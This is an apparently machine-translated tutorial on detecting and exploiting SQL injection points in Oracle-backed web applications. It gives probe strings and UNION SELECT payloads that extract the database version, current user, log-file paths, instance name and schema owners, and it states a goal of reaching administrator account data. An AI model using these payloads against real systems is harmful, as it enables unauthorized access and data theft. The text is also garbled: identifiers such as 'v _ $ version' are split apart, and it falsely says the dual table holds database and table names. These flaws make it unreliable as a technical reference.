Basic Oracle injection point information detection (1)

Basic Oracle Injection Point Information Detection

The Oracle injection point detection is special. Unlike other injection points, you need to perform multiple steps to check whether the database type used by the injection point is Oracle.

Oracle injection point judgment

First, you need to determine whether it is an Oracle injection point. You can submit the following query steps:

And 1 = 1

And 1 = 2

If different pages are returned, the injection vulnerability exists and the following query characters are submitted at the injection point:

/*

"/*" Is a comment in MySQL. If an error is returned, it indicates that the injection point is not MySQL. Continue to submit the following query characters:

--

"--" Is a annotator supported by Oracle and MSSQL. If the returned result is normal, it is one of the two database types. Continue to submit the following query characters:

;

";" Is the identifier of the clause query. Oracle does not support multi-row queries. Therefore, if an error is returned, it is likely to be an Oracle database. Submit the following query:

And exists (select * from dual)

Or

And (select count (*) from user_tables)> 0 --

Dual and user_tables are system tables in Oracle. If a normal page is returned, it can be determined that they are Oracle injection points.

Injection Point Information judgment

After the injection point type is determined, like the previous MySQL injection, Order by x is used to guess the number of fields, and the union select method is used to obtain the desired information.

The most important information is the database version. You can use (select banner from sys. v _ $ version where rownum = 1) to obtain the version information, for example:

And 1 = 2 union select 1, 2, 3, (select banner from sys. v _ $ version where rownum = 1), 4, 5 ...... From dual

Obtain the connection username of the current database and perform the following query:

And 1 = 2 union select 1, 2, 3, (select SYS_CONTEXT ('userenv', 'current _ user') from dual ...... From dual

Execute the following query:

And 1 = 2 union select 1, 2, 3, (select member from v $ logfile where rownum = 1), 4, 5 ...... From dual

You can determine the operating system platform by querying the absolute path of the log file.

To obtain the server sid, run the following query:

And 1 = 2 union select 1, 2, 3, (select instance_name from v $ instance), 4, 5 ...... From dual

Use the Oracle System to expose database content

Like MySQL, you can use Oracle System tables to directly expose all contents in the database. The dual system table exists in Oracle, which stores information such as the database name, table name, and field name. The whole database structure can be obtained through direct injection attacks against the table, this allows you to conveniently query the Administrator account data.

Database Name burst

Submit at the injection point:

And 1 = 2 union select 1, 2, 3, (select owner from all_tables where rownum = 1), 4, 5 ...... From dual

You can query the name of the first database in the burst, and then continue to query and submit:

And 1 = 2 union select 1, 2, 3, (select owner from all_tables where rownum = 1 and owner <> 'first database name ...... From dual

In the same way, you can query the names of all database databases in the current user database.